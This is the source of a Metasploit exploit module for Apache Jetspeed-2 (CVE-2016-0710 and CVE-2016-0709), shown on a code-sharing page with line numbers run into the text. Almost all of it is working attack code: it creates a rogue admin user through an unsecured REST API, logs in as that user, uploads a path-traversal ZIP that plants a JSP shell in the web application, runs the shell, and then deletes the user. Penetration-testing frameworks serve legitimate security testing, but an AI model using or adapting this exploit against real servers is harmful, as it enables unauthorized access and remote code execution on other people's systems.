Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/http/apache_jetspeed_file_upload.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ManualRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::FileDropper1011def initialize(info = {})12super(update_info(info,13'Name' => 'Apache Jetspeed Arbitrary File Upload',14'Description' => %q{15This module exploits the unsecured User Manager REST API and a ZIP file16path traversal in Apache Jetspeed-2, version 2.3.0 and unknown earlier17versions, to upload and execute a shell.1819Note: this exploit will create, use, and then delete a new admin user.2021Warning: in testing, exploiting the file upload clobbered the web22interface beyond repair. No workaround has been found yet. Use this23module at your own risk. No check will be implemented.24},25'Author' => [26'Andreas Lindh', # Vulnerability discovery27'wvu' # Metasploit module28],29'References' => [30['CVE', '2016-0710'],31['CVE', '2016-0709'],32['URL', 'http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and'],33['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709'],34['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710']35],36'DisclosureDate' => '2016-03-06',37'License' => MSF_LICENSE,38'Platform' => ['linux', 'win'],39'Arch' => ARCH_JAVA,40'Privileged' => false,41'Targets' => [42['Apache Jetspeed <= 2.3.0 (Linux)', 'Platform' => 'linux'],43['Apache Jetspeed <= 2.3.0 (Windows)', 'Platform' => 'win']44],45'DefaultTarget' => 046))4748register_options([49Opt::RPORT(8080)50])51end5253def print_status(msg='')54super("#{peer} - #{msg}")55end5657def print_warning(msg='')58super("#{peer} - #{msg}")59end6061def exploit62print_status("Creating admin user: #{username}:#{password}")63create_admin_user64print_status('Logging in as newly created admin')65jetspeed_login66print_status("Uploading payload ZIP: #{zip_filename}")67upload_payload_zip68print_status("Executing JSP shell: /jetspeed/#{jsp_filename}")69exec_jsp_shell70end7172def cleanup73print_status("Deleting user: #{username}")74delete_user75super76end7778#79# Exploit methods80#8182def create_admin_user83send_request_cgi(84'method' => 'POST',85'uri' => '/jetspeed/services/usermanager/users',86'vars_post' => {87'name' => username,88'password' => password,89'password_confirm' => password90}91)92send_request_cgi(93'method' => 'POST',94'uri' => "/jetspeed/services/usermanager/users/#{username}",95'vars_post' => {96'user_enabled' => 'true',97'roles' => 'admin'98}99)100end101102def jetspeed_login103res = send_request_cgi(104'method' => 'GET',105'uri' => '/jetspeed/login/redirector'106)107108res = send_request_cgi!(109'method' => 'POST',110'uri' => '/jetspeed/login/j_security_check',111'cookie' => res.get_cookies,112'vars_post' => {113'j_username' => username,114'j_password' => password115}116)117118@cookie = res.get_cookies119end120121# Let's pretend we're mechanize122def import_file123res = send_request_cgi(124'method' => 'GET',125'uri' => '/jetspeed/portal/Administrative/site.psml',126'cookie' => @cookie127)128129html = res.get_html_document130import_export = html.at('//a[*//text() = "Import/Export"]/@href')131132res = send_request_cgi!(133'method' => 'POST',134'uri' => import_export,135'cookie' => @cookie136)137138html = res.get_html_document139html.at('//form[*//text() = "Import File"]/@action')140end141142def upload_payload_zip143zip = Rex::Zip::Archive.new144zip.add_file("../../webapps/jetspeed/#{jsp_filename}", payload.encoded)145146mime = Rex::MIME::Message.new147mime.add_part(zip.pack, 'application/zip', 'binary',148%Q{form-data; name="fileInput"; filename="#{zip_filename}"})149mime.add_part('on', nil, nil, 'form-data; name="copyIdsOnImport"')150mime.add_part('Import', nil, nil, 'form-data; name="uploadFile"')151152case target['Platform']153when 'linux'154register_file_for_cleanup("../webapps/jetspeed/#{jsp_filename}")155register_dir_for_cleanup("../temp/#{username}")156when 'win'157register_file_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")158register_dir_for_cleanup("..\\temp\\#{username}")159end160161send_request_cgi(162'method' => 'POST',163'uri' => import_file,164'ctype' => "multipart/form-data; boundary=#{mime.bound}",165'cookie' => @cookie,166'data' => mime.to_s167)168end169170def exec_jsp_shell171send_request_cgi(172'method' => 'GET',173'uri' => "/jetspeed/#{jsp_filename}",174'cookie' => @cookie175)176end177178#179# Cleanup methods180#181182def delete_user183send_request_cgi(184'method' => 'DELETE',185'uri' => "/jetspeed/services/usermanager/users/#{username}"186)187end188189#190# Utility methods191#192193def username194@username ||= Rex::Text.rand_text_alpha_lower(8)195end196197def password198@password ||= Rex::Text.rand_text_alphanumeric(8)199end200201def jsp_filename202@jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp'203end204205def zip_filename206@zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'207end208end209210211